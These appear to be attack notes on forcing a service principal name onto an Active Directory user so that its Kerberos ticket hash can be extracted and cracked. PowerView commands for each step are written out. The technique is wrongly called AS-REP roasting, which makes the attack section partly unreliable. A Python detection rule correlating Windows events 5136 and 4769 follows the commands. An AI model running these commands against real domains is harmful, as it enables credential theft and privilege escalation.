TARGETED AS-REP ROASTING
Targeted AS-REP roasting is also known as the Set-SPN attack
Checking for "GenericAll" or "GenericWrite" permission in the ACL, which is needed to modify the SPN
The attacker should be a part of any AD object that the victim is also part of
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "<OBJECT>"}
Enumerating whether the victim has an SPN
Get-DomainUser -Identity <USERNAME> | Select ServicePrincipalName
Forcefully setting SPN for the Victim
Set-DomainObject -Identity <USERNAME> -Set @{serviceprincipalname='DOMAIN/WHATEVER'} -Verbose
Verifying whether the SPN is set
Requesting a new TGS for the SPN we set manually
Requesting a new TGS for the service from a user account
Request-SPNTicket -SPN <SPN FQDN>
Get-DomainUser -Identity <USERNAME> | Get-DomainSPNTicket | Select -ExpandProperty Hash
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <SPN FQDN>
Verifying tickets using klist
CRACK
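Detection view of the steps above, as an added example that is not part of the original page: the SPN write shows up as Security event 5136 (directory service change auditing must be enabled) and the ticket request as event 4769, so the two can be correlated by actor and time. The sample events, account names and the 30-minute window are constructed assumptions; the field names follow those two Windows events.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # assumed correlation window
VALUE_ADDED = "%%14674"          # 5136 OperationType: value added
RC4_HMAC = "0x17"                # 4769 TicketEncryptionType for RC4-HMAC

# Constructed sample events, reduced to the fields the rule needs.
EVENTS = [
    {"id": 5136, "time": "2024-05-01T10:00:05", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=alice,CN=Users,DC=corp,DC=example", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "DOMAIN/WHATEVER", "OperationType": VALUE_ADDED},
    {"id": 4769, "time": "2024-05-01T10:01:40", "TargetUserName": "jdoe@CORP.EXAMPLE",
     "ServiceName": "alice", "TicketEncryptionType": RC4_HMAC},
    # Benign noise: a description change and an unrelated AES ticket request.
    {"id": 5136, "time": "2024-05-01T11:00:00", "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=bob,CN=Users,DC=corp,DC=example", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description",
     "AttributeValue": "moved to finance", "OperationType": VALUE_ADDED},
    {"id": 4769, "time": "2024-05-01T11:02:00", "TargetUserName": "carol@CORP.EXAMPLE",
     "ServiceName": "FILESRV01$", "TicketEncryptionType": "0x12"},
]

def is_spn_write_on_user(ev):
    # Computer accounts update their own SPNs routinely; user objects rarely do.
    return (ev["id"] == 5136 and ev["ObjectClass"] == "user"
            and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
            and ev["OperationType"] == VALUE_ADDED)

def detect(events, window=WINDOW):
    """Alert when the account that added an SPN to a user object requests
    a service ticket within `window` after the change."""
    alerts = []
    for w in filter(is_spn_write_on_user, events):
        t0 = datetime.fromisoformat(w["time"])
        for e in events:
            if e["id"] != 4769:
                continue
            requester = e["TargetUserName"].split("@")[0].lower()
            dt = datetime.fromisoformat(e["time"]) - t0
            if requester == w["SubjectUserName"].lower() and timedelta(0) <= dt <= window:
                alerts.append({"actor": requester, "target_dn": w["ObjectDN"],
                               "spn": w["AttributeValue"], "service": e["ServiceName"],
                               "rc4": e["TicketEncryptionType"].lower() == RC4_HMAC})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The rule matches on who made the change, not on the ticket's encryption type, so it still fires when the request uses AES; the `rc4` flag is only extra context for triage.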